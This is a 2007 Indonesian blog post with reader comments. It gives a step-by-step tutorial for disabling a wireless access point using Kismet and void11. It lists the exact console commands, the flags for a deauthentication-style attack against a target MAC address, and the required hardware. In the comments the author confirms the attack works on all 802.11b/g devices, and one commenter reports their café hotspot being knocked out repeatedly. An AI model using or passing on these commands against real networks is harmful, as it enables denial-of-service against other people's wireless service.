Terima kasih telah berkunjung, Blog ini tercipta atas kerjasama kami dengan http://netkom-wifi.com
selaku distributor perangkat wireless terkemuka di tanah air.
Semoga dengan adanya tulisan-tulisan di blog ini bisa membantu anda dalam memahami dunia wireless.


Regards,


Cak Mad


NB :
Pingin sih buat Blog khusus tentang Korupsi, mengingat negara kita gak bisa Maju, faktor utamanya adalah Korupsi, karena Korupsi membuat hanya Pejabat saja yang Makmur, rakyat tetap terkubur, Korupsi membuat mental pelayanan publik menjadi memble, karena Birokrat kita hanya main gaple (sambil nunggu ceperan).












Wednesday, September 12, 2007

Hacking Wireless IV: MELUMPUHKAN AKSES POIN(AP)



Yang dibutuhkan adalah software void11(download di http://www.wlsec.net/void11) dan Kismet( kalau mau lebih mudah pakai Distro Linux Auditor), lalu hardware yang dibutuhkan Laptop dengan PCMCIA Wifi chipset Prism,
Setelah perangkat yang dibutuhkan siap, jalankan Kismet terlebih dahulu untuk melakukan scanning jaringan wifi, setelah anda mendapat info MAC address dari AP target melalui Kismet, ketikkan pada console:

# switch-to-hostap
# iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master
# void11_penetration wlan0 -D -t 1 -B 00:0E:2E:C2:2C:0E

keterangan : -D = debug
-t 1 = type serangan ke AP
-B = MAC Address AP target


-> Ingat pada waktu menjalankan instruksi serangan, Kismet masih aktif berjalan, jangan menutupnya, lalu tunggu beberapa saat, dan berikutnya.................. rontoklah AP target.

11 komentar:

BlackID said...

Tutorialnya bagus banget om.Om dah pernah coba belum.Terus klo buat melumpuhkan AP yg pake mikrotik bisa g?

mincross said...

iya tuh om... good question tuh.. om dah pernah coba blun. trus ma yg pekara mikrotik.. nih cara bisa dipake ga?

Wilis said...

Pada dasarnya semua tool yang kami posting sudah kami coba, dan tool ini berlaku untuk semua perangkat Wifi 802.11 b/g, termasuk Mikrotik

Sius De Sars said...
This comment has been removed by the author.
Anonymous said...

koq gak bisa lg di downoad? ada penemuan baru ya..?

Cak Mad said...

Anda harus menggunakan CD Linux Auditor, dimana void11 sudah ada dlm paketnya

moel said...

nanya om ya...u/mengetahui sebuah akses poin kita berhasil di lumpuhkan oleh pihak luar apa ya tanda-tandanya? trus untuk pencegahannya gimana?

Cak Mad said...

Halo ponakan !
He he he ya kalo di-ping RTO itu kan sudah lumpuh artinya........
Mudahkan Ponakan.........

Anonymous said...

bos...minta tlg, AP di warkop saya sering bgt dilumpuhkan, dan saat itu pula saya hrus ngeset ulang..ada 2 t4 yg free hotspot dkt warkop sya, cuma gak mau nuduh sembarangan...saya agak buta dng jaringan...plis bantuannya..thanks..

nb : saya menggunakan TP-link TD-w8901G wireless ADSL2+router
(ongen_sheehan@yahoo.com)

Cak Mad said...

Serangan yang melumpuhkan yg gimana maksudnya, karena kita harus tahu type serangan yg terjadi pada AP anda,dgn tahu kita bisa menanggulanginya

Mirza said...

wow keren bro !!